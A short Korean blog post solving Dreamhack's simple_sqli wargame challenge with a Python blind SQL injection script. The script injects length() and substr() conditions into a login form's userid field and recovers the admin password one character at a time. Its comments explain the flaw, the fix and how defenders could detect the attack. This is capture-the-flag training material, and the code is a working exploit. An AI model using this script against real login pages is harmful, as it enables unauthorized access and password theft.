
[Dreamhack] blind sql injection

프레딕 2024. 4. 10. 18:16

dreamhack의 simple_sqli를 blind sql injection으로 풀어보았다.

import requests

# Login endpoint of the training-challenge instance. The login handler is
# presumably building its SQL from the submitted `userid` by string
# concatenation; that is the defect every probe below depends on, and a
# parameterized query would remove it entirely.
URL="http://host3.dreamhack.games:11344/login"

# password length (found by the probe loop below; 0 until then)
password_length: int = 0
# Unused string literal: a disabled binary-search variant of the length probe.
# It is an expression statement with no effect and is never executed.
'''
def binsearch(low: int, high: int):
    while 1:
        mid = (low + high) // 2
        if low + 1 >= high:
            break
        data = {"userid" : f"admin\" and length(userpassword) < {mid} -- ", "userpassword" : 1}
        r = requests.post(URL, data=data)
        if "admin" in r.text:
            high = mid
        else:
            low = mid
    return mid

print(binsearch(0, 100))
'''


# Length probe: one POST per candidate length, starting at 1. The boolean
# oracle is the literal string "admin" appearing in the response body; the
# `-- ` tail comments out the rest of the server's query, which is why the
# `userpassword` value sent here is irrelevant (always 1).
# NOTE(review): there is no upper bound, so if the condition never matches
# (instance down, endpoint fixed) this loop never terminates.
while True:
    password_length+=1
    data = {"userid" : f"admin\" and length(userpassword) = {password_length} -- ", "userpassword" : 1}
    r = requests.post(URL, data=data)

    if "admin" in r.text:
        print(password_length)
        break

# Candidate alphabet for each position: digits and lowercase ASCII only.
# (Shadows the builtin `list`; nothing below relies on the builtin.)
list = "1234567890abcdefghijklmnopqrstuvwxyz"
pw: str =""

# Character probe: for each position i, try every candidate j until the
# oracle fires, then append it. Worst case this is password_length * 36 login
# POSTs, each carrying a SQL fragment in the userid field — from a defender's
# side, that burst of near-identical failed logins with `substr(`/`-- ` in a
# username is an easy server-side pattern to log and alert on.
# NOTE(review): if a position holds a character outside the alphabet, the
# inner loop finishes without appending anything, so `pw` silently ends up
# shorter than `password_length`.
for i in range(1, password_length+1):
    for j in list:
        uid = f'admin" and substr(userpassword, {i}, 1) = \'{j}\' -- '
        data = {"userid" : uid, "userpassword" : 1}
        r = requests.post(URL, data=data)
        if "admin" in r.text:
            pw += j
            print(pw)
            break

# Final recovered value (also printed incrementally above).
print(pw)